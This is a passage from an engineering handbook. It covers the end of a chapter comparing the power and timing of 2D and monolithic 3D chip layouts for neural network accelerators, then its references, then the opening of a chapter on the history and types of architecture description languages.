Total power (mW) 141.1 109.6 −22.3% 138.0 −2.2%
Pseudo-training Internal power (mW) 150.4 142.8 −5.1% 148.3 −1.4%
Net switching power (mW) 68.4 57.1 −16.6% 65.6 −4.2%
Leakage power (mW) 1.3 1.2 −6.8% 1.3 0.7%
Total power (mW) 220.0 201.0 −8.6% 215.0 −2.3%
DNN CGS-64
Classification Internal power (mW) 86.8 76.1 −12.3% 84.9 −2.2%
Net switching power (mW) 41.2 30.2 −26.7% 42.8 3.9%
Leakage power (mW) 1.1 1.1 −4.7% 1.1 1.5%
Total power (mW) 129.1 107.3 −16.9% 128.8 −0.2%
Pseudo-training Internal power (mW) 129.2 120.0 −7.2% 128.5 −0.5%
Net switching power (mW) 46.0 36.3 −21.2% 50.3 9.3%
Leakage power (mW) 1.1 1.1 −4.6% 1.1 1.4%
Total power (mW) 176.3 157.4 −10.7% 179.9 2.0%
reported for each design. The sign-off power calculations are conducted using two
speech recognition workloads: classification and pseudo-training.
During classification, CGS-16 consumes 141.1 mW, while CGS-64 consumes
129.1 mW. This confirms that CGS-16 consumes more power to handle more
complex weight selection process. A similar trend is observed during pseudo-
training.
Pseudo-training, as expected, causes more switching in the circuits and thus more
power consumption compared with classification for both CGS-16 and CGS-64
architectures.
Next, the power consumption of 2D and M3D ICs is compared. The resulting
footprint of M3D-both designs is reduced by half, thereby reducing the wire-length
between the cells. Figure 36a shows the wire-length distribution of the 2D and M3D
ICs of CGS16 architecture. The histogram clearly shows that M3D ICs contain more
number of short wires and fewer long wires compared with 2D IC. The effect of
wire-length saving translates to the reduction of wire capacitance Cwire in Eq. 1,
therefore the saving of the third term of the equation.
Figure 36b presents the distribution of standard cells with different ranges of
cell drive-strength. M3D-both design uses more number of low drive-strength cells
(i.e., ×0 ∼ ×0.8) and fewer high drive-strength cells (i.e., ×1 ∼ ×16). Since
low drive-strength cells utilize smaller transistors, the short circuit current of the
transistors and Cpin are lower, which reduces both the first and second term in Eq. 1.
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 795
a b
μ
M3D-both M3D-one
Fig. 36 (a) Wire-length and (b) cell drive-strength distribution of DNN CGS-16 2D, M3D-both,
and M3D-one
DNN CGS design with 16x16 block size DNN CGS design with 64x64 block size
logic logic
logic logic
a b c d
Fig. 37 GDS layouts of 2D and M3D ICs of DNN CGS-16 and CGS-64 architectures at the
maximum target frequencies. (a) 2D IC at 550 MHz, (b) M3D IC at 575 MHz of DNN CGS-16
architecture, (c) 2D IC at 600 MHz, (d) M3D IC at 625 MHz of DNN CGS-64 architecture
796 K. Chang and S. K. Lim
timing analysis, and the effective clock frequency, which is the maximum achievable
clock frequency that the designs are able to operate at without timing violation.
Comparing only the 2D ICs of CGS-16 and CGS-64 architectures, the effective
clock frequency of the CGS-16 2D IC is 11.1% less than the CGS-64 2D IC. As the
critical path of the CGS-16 2D IC starts from weight SRAM to MAC unit through
weight selection logic, the lower effective clock frequency of the CGS-16 2D IC is
attributed to its more complex weight selection logic as shown in a higher design
density in Fig. 37a compared to Fig. 37c.
Next, the maximum performance of the 2D and M3D ICs is compared. The M3D
ICs shows 6.2% and 1.2% performance improvement over 2D counterparts in CGS-
16 and CGS-64 architectures, respectively. To analyze this trend, the worst timing
path comparison of the 2D and M3D ICs is conducted. Fig. 38 compares the same
timing path (i.e., the worst timing path of the 2D IC) in the 2D and M3D CGS-16
designs at the maximum target clock frequency of the 2D IC, and Table 17 presents
key metrics of the timing path.
The wire-length of the worst timing path of the 2D IC is 53.6% longer than the
same timing path in the M3D IC. This is attributed to the reduced footprint and the
Table 16 Maximum performance comparison of 2D and M3D ICs of DNN CGS-16 and CGS-64
architectures
Parameter DNN CGS-16 DNN CGS-64
2D Target clk freq (MHz) 550 600
WNS (ns) −0.056 0.002
Effective clk freq (MHz) 534 601
M3D Target clk freq (MHz) 575 625
WNS (ns) −0.024 −0.046
Effective clk freq (MHz) 567 608
% effective clk freq 6.2% 1.2%
Fig. 38 Worst timing path comparison of 2D and M3D ICs of DNN CGS-16 architecture. (a) The
worst timing path of 2D IC at its maximum target clock frequency, 550 MHz. (b) The same timing
path in M3D IC
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 797
inter-tier connections of the M3D IC, which results in shorter distance among cells
along the timing path. The M3D IC offers 24.6% cell count saving as well as 21.3%
average cell drive-strength reduction, thereby reducing cell area by 63.1% of the
timing path. This is because the fewer and smaller buffers are needed to drive the
reduced wire-load, which is a result of the wire-length reduction.
Compared to the 2D IC, the wire and pin capacitance of the timing path in
the M3D IC are reduced by 51.6% and 35.8%, respectively. The wire capacitance
reduction mainly comes from the wire-length reduction of the timing path, whereas
the pin capacitance saving results from the cell count and cell drive-strength
reduction. In addition, the M3D IC achieves 35.9% resistance reduction in the
timing path. The resistance saving is also attributed to the wire-length saving along
the timing path.
Due to the capacitance and resistance saving of the worst timing path, the delay
of the timing path is reduced by 10.9% in the M3D IC, thereby offering rooms to
improve the performance.
In order to understand the impact of the above observations to the overall timing
paths of the 2D and M3D ICs, the slack distribution of all timing paths of the 2D
and M3D CGS16 designs is reported in Fig. 39. While 18 timing paths of the 2D
IC violate the timing constraints, the M3D IC successfully closes timing without
any violation. In addition, there are more timing paths with high positive slack in
the M3D IC, which indicates that timing is easily closed in the M3D IC due to the
reduced delay of the timing paths.
The difference in the performance improvement of the M3D ICs of CGS-16 and
CGS64 architecture is be discussed in detail in the next section.
Fig. 39 Slack distribution comparison between 2D and M3D ICs of DNN CGS-16 architecture at
the maximum clock frequency of the M3D IC
Fig. 40 Standard cell area breakdown of 2D CGS-16 and CGS-64 architectures. Non-dashed
and dashed boxes, respectively, indicate combinational and sequential elements. Only five largest
modules are shown
algorithm). The 1024 × 1024 weight matrix is divided into 256 (= 16 × 16) weight
blocks in CGS-64 architecture. This count becomes 4096 (= 64 × 64) weight
blocks in CGS-16. The implication in DNN architecture is that CGS-16 requires a
more complex neuron selection unit than CGS-64. Figure 40 shows the comparison
of standard cell area of each module in CGS-16 and CGS-64 architectures. Both
sequential (dashed box) and combinational logic (non-dashed box) portion in each
module are shown. The neuron selection unit in CGS-16 architecture (shown in
purple) occupies more area than that in CGS-64 architecture.
As discussed before, M3D ICs benefit not only from wire-length reduction
but also from standard cell area saving. The number of storage elements (i.e.,
sequential logic and memory blocks) used in 2D and M3D ICs remains the same.
Thus, the only possible power reduction coming from storage elements is their
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 799
M3D-both
M3D-both
M3D-both
M3D-both
Classification Pseudo Training
Fig. 41 Power breakdown under two DNN architectures (CGS-16 and CGS-64), two workloads
(classification and pseudo-training), and two designs (2D and M3D ICs)
drive-strength reduction. This does not show a huge impact considering the small
portion of sequential elements in the DNN architectures (16.1% on average). On
the other hand, combinational logic can be optimized in various ways, such as logic
reconstructing and buffer reduction. Therefore, the DNN M3D ICs benefit more
from combinational logic gates than sequential elements.
Figure 41 shows the breakdown of total power consumption into combina-
tional, register, clock, and memory portions. Combinational power reduction is the
dominant factor in total power saving of M3D ICs in both CGS-16 and CGS-64
architectures and in both classification and pseudo-training workloads. The saving
in other parts including register, clock, and memory power largely remains small.
In addition, the neuron selection unit in CGS-16 architecture consists of a larger
number of combinational logic gates than CGS-64. Thus, its M3D ICs have more
room for power optimization, resulting in a larger combinational power saving.
The larger neuron selection logic in CGS-16 architecture also offers more
opportunity to improve the performance of M3D ICs. While 2D ICs suffer long
timing path due to the complex neuron selection logic, M3D ICs effectively reduce
the wire-length, providing buffer count/size reduction along the worst timing path.
This reduces the capacitance and resistance of timing paths, thereby offering shorter
delay and larger performance improvement.
Figure 42 compares the total wire-length and standard cell count along the
selected 486 timing paths, which are from weight SRAMs to registers of MAC
units through neuron selection logic, in the 2D/M3D CGS-16/CGS-64 designs at
800 K. Chang and S. K. Lim
a b
-25%
-51% -11%
-29%
Fig. 42 Comparison of (a) the wire-length and (b) cell count of the timing paths from weight
SRAMs to registers in MAC units through neuron selection logic in 2D and M3D both of DNN
CGS-16 and CGS-64 architecture
the maximum frequency of the 2D ICs. Comparing only the 2D ICs, the CGS-16 2D
IC clearly utilizes longer wire-length as well as more standard cells as the neuron
selection logic is more complex. As the CGS-16 M3D IC has more combinational
logics to optimize with the reduced footprint, it offers more cell count and wire-
length reduction compared to the CGS-64 M3D IC, providing more rooms for
performance improvement in higher clock frequency.
Impact of Workloads
In order to investigate the impact of different DNN workloads on M3D power
saving, two main types of speech recognition DNN workloads are analyzed:
feed-forward classification and training. Real-world test vectors are used for feed-
forward classification. However, since the current architecture does not support
online training to avoid computational overhead of finding gradients in DNN
training, customized test vectors are created for “pseudo-training.” Online training
on DNN consists of feed-forward computation and backward computation. In order
to mimic the online training on the current architecture, there are two phases in
the pseudo-training test vectors as shown in Fig. 43. In the first phase, the DNN
performs feed-forward classification, which represents feed-forward computation
during training. In the second phase, the DNN conducts feed-forward classification
and writes the weights to memory blocks, which represents backward computation
and weight update. These two phases mimic the behavior of logic computation and
weight update during training.
Table 15 shows that while M3D-both shows 22.3% (CGS-16) and 16.9% (CGS-
64) total power reduction in feed-forward classification workload, the power saving
of pseudo-training workload is only 8.6% (CGS-16) and 10.7% (CGS-64). This
difference stems from different switching patterns of combinational logic and
storage elements in the DNN architecture. The DNN mainly uses combinational
logic gates to compute the values of neuron outputs and access memory for read
operations only during feed-forward classification. Thus, this workload is classified
as a compute-intensive kernel. On the other hand, memory operations are heavily
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 801
b
a
phase 1 phase 2
feed-forward feed-forward feed-back
logic operation logic operation logic operation
mem. write
0 T t 0 T 2T t
Fig. 43 Comparison of the operations in (a) the feed-forward classification and (b) pseudo-
training
used during pseudo-training since the DNN architecture needs to read and write
weights. This becomes a memory-intensive kernel. Therefore, switching activity in
memory blocks is much higher during pseudo-training while that of combinational
logic remains largely similar. This explains larger power consumption during
pseudo-training workload: 220.0 mW vs. 141.1 mW for CGS-16 and 176.3 mW
vs. 129.1 mW for CGS-64 as shown in Table 15.
As shown in Fig. 41, memory power and register power occupy a large portion
of the total power during pseudo-training. This means that the combinational logic
power saving becomes a smaller portion of the total power saving during training.
The opposite is true for classification, where memory and register power are less
dominant. In this case, the reduction in combinational power saving becomes more
prominent in the total power saving.
Conclusion
References
Arden W, Brillouët M, Cogez P et al (2012). More-than-Moore, A White Paper. In IEEE
international roadmap for devices and systems, p 31
Batude P, Fenouillet-Beranger C, Pasini L et al (2015) 3DVLSI with CoolCube process: an
alternative path to scaling. In Proc. symp. on VLSI technology, 2015
Billoint O, Sarhan H, Rayane I et al (2015) A comprehensive study of monolithic 3D cell on cell
design using commercial 2D tool. In: Proc. design, automation and test in Europe, 2015
Bozorgzadeh B, Afzali-Kusha A (2008) Decoupling capacitor optimization for nanotechnology
designs. In: Proc. int. conf. on microelectronics, 2008
Chang K, Acharya K, Sinha S et al Impact and design guideline of monolithic 3-D IC at the 7-nm
technology node IEEE Trans VLSI System, vol. 25, p. 2118–2129, July 2017
ChengY, Yu FX, Feris RS et al (2015) An exploration of parameter redundancy in deep networks
with circulant projections. arXiv:1502.03436 [cs], February 2015
Cheng Y, Wang D, Zhou P (2017) A survey of model compression and acceleration for deep neural
networks. arXiv:1710.09282 [cs], October 2017
Conneau A, Kiela D, Schwenk H et al (2017) Supervised learning of universal sentence
representations from natural language inference data. arXiv:1705.02364 [cs], May 2017
Courbariaux M, Bengio Y, David J-P (2015) Binary connect: training deep neural networks with
binary weights during propagations. arXiv:1511.00363 [cs], November 2015
22 Design and Tool Solutions for Monolithic Three-Dimensional Integrated Circuits 803
Courbariaux M, Hubara I, Soudry D (2016) Binarized neural networks: training deep neural
networks with weights and activations constrained to +1 or −1. arXiv:1602.02830 [cs],
February 2016
Das S, Whatmough P, Bull D (2015) Modeling and characterization of the system-level power
delivery network for a dual-core aRM cortex-A57 cluster in 28 nm CMOS. In: Proc. int. symp.
on low power electronics and design, 2015
Deng L, Hinton G, Kingsbury B (2013) New types of deep neural network learning for speech
recognition and related applications: an overview. In: Proc. int. conf. on acoustics, speech and
signal processing, 2013
Gardner WA (1984) Learning characteristics of stochastic-gradient-descent algorithms: a general
study, analysis, and critique. Signal Process 6:113–133
Garofolo JS, Lamel LF, Fisher WM et al (1993) DARPA TIMIT acoustic-phonetic continous
speech corpus CD-ROM. NIST Speech Disc 1-1.1, NASA STI/Recon technical report N,
vol. 93, February 1993
Graves A, Mohamed A-r, Hinton G (2013) Speech recognition with deep recurrent neural
networks. arXiv:1303.5778 [cs], March 2013
Gray S, Radford A, Kingma DP (2017) GPU kernels for block-sparse weights
Han S, Mao H, Dally WJ (2015) Deep compression: compressing deep neural networks with
pruning, trained quantization and huffman coding. arXiv:1510.00149 [cs], October 2015
Han S, Kang J, Mao H et al (2016) ESE: efficient speech recognition engine with sparse LSTM on
FPGA. arXiv:1612.00694 [cs], December 2016
He T, Fan Y, Qian Y et al (2014) Reshaping deep neural network for fast decoding by node-pruning.
In: Proc. int. conf. on acoustics, speech and signal processing, 2014
He K, Zhang X, Ren S et al (2015) Deep residual learning for image recognition. arXiv:1512.03385
[cs], December 2015
Kadetotad D, Arunachalam S, Chakrabarti C et al (2016) Efficient memory compression in deep
neural networks using coarse-grain sparsification for speech applications. In: Proc. int. conf. on
computer-aided design
Karpathy A, Fei-Fei L (2017) Deep visual-semantic alignments for generating image descriptions.
IEEE Trans Pattern Anal Machine Intell 39:664–676
Khan NH, Alam SM, Hassoun S (2011) Power delivery design for 3-D ICs using different through-
silicon via (TSV) technologies. IEEE Trans VLSI System 19:647–658
Krizhevsky A, Sutskever I, Hinton GE (2012) ImageNet classification with deep convolutional
neural networks. In: Proc. int. conf. on neural information processing systems, 2012
Larsson P (1998) Resonance and damping in CMOS circuits with on-chip decoupling capacitance.
IEEE Trans Circuits System 45:849–858
Liao W, He L, Lepak KM (2005) Temperature and supply voltage aware performance and power
modeling at microarchitecture level. IEEE Trans Comput-Aided Design Integr Circuits Syst
24:1042–1053
Liao S, Li Z, Lin X et al (2017) Energy-efficient, high-performance, highly-compressed deep
neural network design using block-circulant matrices. In: Proceedings of IEEE international
conference on computer aided design
Okada M, Sugaya I, Mitsuishi H et al (2014) High-precision wafer-level Cu-Cu bonding for 3DICs.
In: Proc. int. electron devices meeting, 2014
Pant S, Chiprout E (2006) Power grid physics and implications for CAD. In: Proc. design
automation conf. 2006
Panth SA, Samadi K, Du Y, Lim SK (2014) Design and CAD methodologies for low power
gate-level monolithic 3D ICs. In: IEEE international symposium on low power electronics and
design, 2014
Povey D, Ghoshal A, Boulianne G et al (2011) The kaldi speech recognition toolkit. IEEE
workshop on automatic speech recognition and understanding, January 2011
Seo KI, Haran B, Gupta D et al (2014) A 10nm platform technology for low power and high
performance application featuring FINFET devices with multi workfunction gate stack on bulk
and SOI. In: Proc. symp. on VLSI technology, 2014
804 K. Chang and S. K. Lim
Song T, Rim W, Jung J et al (2015) A 14 nm FinFET 128 Mb SRAM with Vrm MIN enhancement
techniques for low-power applications. IEEE J Solid State Circuits 50:158–169
Su D, Wu X Xu L (2010) GMM-HMM acoustic model training by a two level procedure with
gaussian components determined by automatic model selection. In: Proc. int. conf. on acoustics,
speech and signal processing
Sze V, Chen Y-H, Emer J et al (2017) Hardware for machine learning: challenges and opportunities.
arXiv:1612.07625 [cs], April 2017
Wu SY, Lin CY, Chiang MC et al (2013) A 16 nm FinFET CMOS technology for mobile SoC and
computing applications. In: Proc. int. electron devices meeting, 2013
Xiong W, Droppo J, Huang X et al (2016) The Microsoft 2016 conversational speech recognition
system. arXiv:1609.03528 [cs], September 2016
Yang SH, Sheu JY, Ieong MK et al (2011) 28nm metal-gate high-K CMOS SoC technology for
high-performance mobile applications. In: Proc. custom integrated circuits conf., 2011
Part V
Processor Design and Programming Flows
Architecture Description Languages
23
Anupam Chattopadhyay , Zheng Wang, and Grant
Edmund Martin
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 808
A Brief History of ADLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 812
The Classical Era: 1990–2000 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 813
The First Industrial Era: 2000–2010 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 813
The Second Industrial Era: 2010–2020 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 814
Types and Characteristics of ADLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 814
Types of ADLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 814
Characteristics of ADLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 815
Key ADLs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 816
MIMOLA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 816
EXPRESSION . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 817
nML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 817
LISA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 818
PEAS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 819
TENSILICA TIE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 819
ARC APEX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 820
Codasip CodAL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 821
Andes ACE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 822
RISC-V Chisel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 822
A. Chattopadhyay
School of Computer Science and Engineering, Nanyang Technological University, Singapore,
Singapore
e-mail: [email protected]
Z. Wang ()
Shenzhen Institute of Advanced Technology, Chinese Academy of Sciences, Shenzhen, China
e-mail: [email protected]
G. E. Martin
Independent Consultant, Pleasanton, CA, USA
e-mail: [email protected]
Abstract
Keywords
Introduction
The development of electronics since the middle of the last century has been notable
for many advances in technology, but one in particular was described by Tsugio
Makimoto of Sony in Japan in 1991: Makimoto’s Wave (Makimoto 2002). In
this paper, Makimoto describes how the semiconductor industry has swung on a
cyclical basis between standardization and customization, in cycles lasting about
a decade. When one considers computing devices in the most general terms, from
the mainframe computer through to the modern era of both desktops, laptops, and
servers as one pole, and embedded computing devices found ubiquitously around
everyone in appliances, phones, wearable devices, vehicles, and the “Internet of
Things (IoT),” one can see very similar waves.
23 Architecture Description Languages 809
The earliest mainframe era, for example, featured many different types of
processors with their associated Instruction Set Architectures (ISAs) – so, a lot
of customization. But the IBM 360 ISA became dominant in the marketplace –
so was standardized in many uses. Minicomputers followed the same trend, with
a variety of vendors, but the DEC ISAs becoming dominant. The advent of
the microprocessor led to a wide variety of processor architectures and ISAs,
(customization), but two in particular became dominant: Intel’s x86 ISA, for
desktops, laptops, and servers, and ARM’s embedded processors for phones and
many other devices. Hence, customization was followed by standardization.
The design and verification of new processor ISAs in the earliest days required
large engineering teams. These included large hardware teams and also specialized
software teams to create the tools required to program and debug these proces-
sors. As ISAs swung from Complex Instruction Set Computers (CISCs) through
to generations of Reduced Instruction Set Computers (RISCs), the role of the
optimizing compiler grew ever more important so that programmers could develop
the increasing amount of application software required to allow the proliferation of
computing into all aspects of life (see Chap. 32, “Retargetable Compilation”).
Proliferation of programming languages at various levels of abstraction made
the software tools crisis ever more in need of a solution. The tools available
in both hardware and software domains in the early periods were primitive and
led in themselves to considerable research and development of electronic design
automation (EDA) tools for hardware design and verification and new programming
models, abstractions, and tools in the software domain.
All these computing devices use programmable components: processors, copro-
cessors, and relatively less-programmable components, such as in-memory com-
puting accelerators and Tensor Processing Units (TPUs). These programmable
components are also generally referred as programmable accelerators. Figure 1
shows a typical embedded system with various programmable accelerators. In any
chosen application domain, the embedded system can have application-specific pro-
grammable accelerators, reconfigurable logic fabrics, general-purpose graphics pro-
cessing units, digital signal processors, image/audio/cryptographic co-processors,
specialized processors for Artificial Intelligence/Machine Learning (“AI/ML”)
computations, communication buses, and peripherals. The variety and complexity
of these programmable accelerators are increasing at a rapid pace due to the growing
demand for design of increasingly complex applications in smart healthcare, smart
infrastructure, ubiquitous communication, and in general applications driven by
growth of communication, sensing, and intelligence capabilities. This push for
complex programmable accelerator design is further made challenging due to
shrinking time-to-market as well as short product lifetimes. This calls for an efficient
and effective design automation flow for complex programmable accelerators (often
known as Application-Specific Instruction-set Processors, or ASIPs).
The most crucial roles in the design automation of ASIPs are played by
specification and modeling. It is imperative to develop a high-level and sufficiently
expressive specification language that can model the complex processors and their
ISAs. The specification language needs to enable automated design performance
810 A. Chattopadhyay et al.
Audio
Co-Processor
Analog- Base Image
Digital Processor Sensor,
Co-Processor
Converter Actuator
Cryptographic
Co-Processor
Network-on-Chip
Digital Signal
Processor
DMA
Controller Re-
Memory
Configurable GPGPU
Subsystem
Logic
Architecture
Specification
Design Space
Exploration
Application ADL
Profiler Specification
Automatic
Toolflow
Evaluation
(Runtime, Frequency,
Area, Reliability, Functionality)
The history of ADLs can be divided into three eras, each approximately a decade or
so in length. These are:
changes. There were also significant arrivals of new ADLs from new commercial
providers, triggered in part by the RISC-V movement. Except for RISC-V, which
arose in academia, most of the academic interest in ADL research declined.
The growth in RISC-V architectures is also timed with a range of serious
vulnerabilities identified in commercial processors. Thus, RISC-V architectures
and its associated design flows do consider security as a fundamental design
objective (Watson et al. 2019).
In addition to the brief descriptions of ADLs in this chapter, the reader might
look to several comprehensive ADL surveys available in the literature including
ADLs for retargetable compilation (Qin and Malik 2002), programmable embedded
systems (Mishra and Dutt 2005b), and SoC design (Tomiyama et al. 1999). A
definitive compilation of the ADLs can be found in references (Leupers et al. 2016;
Mishra and Dutt 2008).
In the classical era, there were notable academic research results developed in ADLs
and tool flows. Motivations included a desire to raise the EDA levels of abstraction
to higher levels to better automate processor design. Thus, there is a natural basis
in the ADL work to evolve from RTL abstractions and to focus more on hardware
generation. Examples of early research ADLs are Mimola, EXPRESSION, nML,
LISA, and PEAS, which are described below.
This era saw two major developments: a transition from academic research to
industrial application for some ADLs such as LISA and nML, and the development
within industry of ADL-based ASIP design tools such as Tensilica TIE, and ARC
APEX.
The industrial history based both on within-industry developments and academic
transfers can be complex and hard to follow. nML, for example, was commercialized
by Target Compiler Technologies in 1996, later purchased by Synopsys in 2014.
LISA spun out of the Institute for Integrated Signal Processing Systems (ISS) of
RWTH Aachen as a company, LISATek, in 2001. LISATek was then bought by
CoWare in 2003; CoWare itself was acquired by Synopsys in 2010.
ARC Cores spun out of Argonaut Games and one of its successor companies,
Argonaut Technologies, Limited, in 1996 as a commercial company and was
acquired by Virage Logic in 2009. Virage Logic was acquired by Synopsys in
2010; thus, by 2014, Synopsys had three ADL-based technologies: nML (Target
Compilers), LISA (LISATek), and ARC APEX (ARC/Virage).
814 A. Chattopadhyay et al.
In this phase of ADL evolution, there have been some new ADLs emerging from
industry. However, these did not divert much from the basic ADL semantics already
established by the first- and second-generation ADLs.
During the second industrial era, Tensilica, which had started in 1997, was
acquired by Cadence in 2013, and the decade saw further development of Tensilica
configurable, extensible processor technology under the Xtensa name, including its
ADL TIE. Synopsys, which by 2010 had two ADL-based technologies and added
nML by 2014, continued to develop ARC APEX as part of its ARC offering. It
also merged aspects of its ASIP technologies into a more unified tool called ASIP
Designer (Synopsys ASIP Designer), which is the current home of nML within
Synopsys today.
Because the fundamental ADL research had been done during the first and
second generation of research and development, interest in ADL-based research
in academia declined considerably during the second industrial era. Most academic
interest lay in using ADLs to create interesting applications, as will be seen later.
Types of ADLs
Looking at ADLs in 2022, one can distinguish two basic types of ADLs: complete
and ISA extension.
Complete ADLs allow the designer to capture all aspects of a processor and
its ISA: all processor resources and properties and all aspects of the complete
ISA including all basic scalar operations and all operation extensions including
vector/SIMD operations and their associated resources and properties. A tool flow
supporting a complete ADL will compile it into all relevant derivative design files
needed to support the HW implementation, SW creation, and the HW-SW interface.
The net result is an ASIP designed from the ground up. Examples of complete ADLs
include MIMOLA, nML, EXPRESSION, and LISA.
ISA extension ADLs are intended to allow designers to extend a configurable,
extensible processor by adding new operations/instructions to a basic core ISA.
Somewhat ironically, the core ISA itself may also be partially captured using the
ADL, but there is usually a “hard core” part of the ISA captured in configurable
RTL and supported deeply within the SW tools. The extension ISA adds relevant
resources, properties, and behavioral and structural descriptions of the additional
instruction extensions, and these are compiled by the tool flow into additional HW
implementations and SW tool properties that add to the basic hard core ISA support
in the tool flow. The net result is an ASIP designed via additions to the core ISA.
Examples of ISA extension ADLs include Cadence/Tensilica TIE, Synopsys
ARC APEX, ANDES ACE, and Codasip CodAL.
23 Architecture Description Languages 815
Characteristics of ADLs
Key ADLs
MIMOLA
MIMOLA is one of the oldest ADLs, predating the “classical” 1990s period by more
than a decade (Marwedel 1979) and with continued development for two decades
(Leupers and Marwedel 1998). It was developed at the University of Dortmund,
Germany, and originally proposed for microarchitecture design. As befits the ADL
concept, with MIMOLA the same description can be used for synthesis, simulation,
test generation, and compilation. Its tool chain included the MSSH hardware
synthesizer, the MSSQ code generator, the MSST self-test program compiler, the
MSSB functional simulator, and the MSSU RT-level simulator, and MIMOLA has
also been used by the RECORD (Leupers and Marwedel 1998) compiler.
The MIMOLA description is in three parts: the algorithm to be compiled,
the target processor model, and additional linkage and transformation rules. The
software part is an algorithm description using a PASCAL-like syntax for appli-
cation programs. The target processor model uses a component netlist to define a
microarchitecture. The compiler uses the “linkage” information to define important
modules such as program counter and instruction memory.
23 Architecture Description Languages 817
EXPRESSION
nML
nML was created at the Technical University of Berlin, Germany (Freericks 1993),
and originally supported software tool generation from behavioral descriptions,
more than hardware generation. However, over its long history as enumerated above,
its capabilities were extended by Target Compiler Technologies (Goossens et al.
2006), and in the form of the Synopsys ASIP designer (Synopsys ASIP Designer),
where it eventually ended up, it is a large part of a complete and sophisticated
commercial ASIP generation system.
818 A. Chattopadhyay et al.
In its early days, nML was used by code generators CBC (Fauth and Knoll 1993)
and CHESS (Lanneer et al. 1995) and instruction-set simulators – what was called
CHECKERS (Goossens et al. 2006). The CHESS/CHECKERS environment was
used for automatic and efficient software compilation and instruction-set simulation,
but was extended to support HDL generation and test program generation (Goossens
et al. 2006).
Very early in ADL history, the nML developers recognized the fact that several
instructions share common properties, which could help make the final nML
description compact and simple. Therefore, nML uses a hierarchical scheme to
describe instruction sets. The instructions are the topmost elements in the hierarchy.
The intermediate elements of the hierarchy are partial instructions (PI). Two
composition rules, AND-rule and OR-rule, are used to establish relationships
between elements. The AND-rule groups several PIs into a larger PI and the OR-
rule enumerates a set of alternatives for one PI. Since instruction definitions in nML
are thus in the form of an and-or tree, each possible traversal from the root to the
leaf node of the tree gives an actual instruction.
Early nML also captures the structural information used by the ISA. For example,
storage units are declared since they are visible to the instruction-set. nML supported
three types of storage: RAM, register, and transitory storage. Transitory storage
refers to machine states that are retained only for a limited number of cycles.
Computations had no delay in the nML timing model – only storage units have
delay. Instruction delay slots are modeled by introducing storage units as pipeline
registers. The result of the computation is propagated through the registers in the
behavior specification.
Early nML usage had a number of limitations that made it difficult to model
complicated constraints found in DSPs with irregular instruction level parallelism
or VLIW processing with multiple issue slots. A detailed review of nML from 1997
(Hartoog et al. 1997) discusses some of those limitations.
However, in its use by Target Compiler Technologies and then by Synopsys as a
fundamental technology for ASIP design, its capabilities were extended or used in a
complementary fashion with other aspects of ASIP designer to allow a wide variety
of ASIPs to be designed with various architectures. A good overview of nML as
currently used in ASIP Designer is available in (Bo and Willems 2015).
LISA
Language for Instruction Set Architecture (LISA) (Meyr et al. 2008) was developed
at RWTH Aachen University, Germany, originally to help in developing fast
simulators (Nohl et al. 2002). By trading off speed and accuracy constraints,
different modes of instruction-set simulator, for example, compiled, interpretive,
and just-in-time cache-compiled (JIT-CC), could be generated. LISA could be used
in a stepwise fashion to gradually increase the level of details: A designer could
start with an instruction-accurate LISA description, carry out early design space
exploration, and then refine the design to a detailed, cycle-accurate model. To
support this kind of design, application profiling, automatic instruction-set encoding
23 Architecture Description Languages 819
(Nohl et al. 2003), as well as custom instruction identification (Leupers et al. 2006)
played an important role. From a cycle-accurate LISA description, optimized, low-
power RTL (Chattopadhyay et al. 2006a; Chattopadhyay et al. 2006b) generation
was possible. LISA also provided a methodology for automated test pattern and
assertion generation (Chattopadhyay et al. 2006c) and was also used to generate
retargetable C compilers (Hohenauer et al. 2004; Wahlen et al. 2003).
During the LISATek era, the language was extended to cover a wide range of
processor architectures such as VLIW, weakly programmable ASICs (Wang et al.
2012), Coarse-Grained Reconfigurable Architectures (CGRAs) (Chattopadhyay
et al. 2008), and partially reconfigurable ASIPs (rASIPs) (Chattopadhyay et al.
2009). However, after acquisition by Synopsys, and its further acquisition of Target
Compiler Technologies with nML in 2014, specific aspects of LISA technology
were subsumed into the ASIP Designer toolset, which is heavily based on nML, and
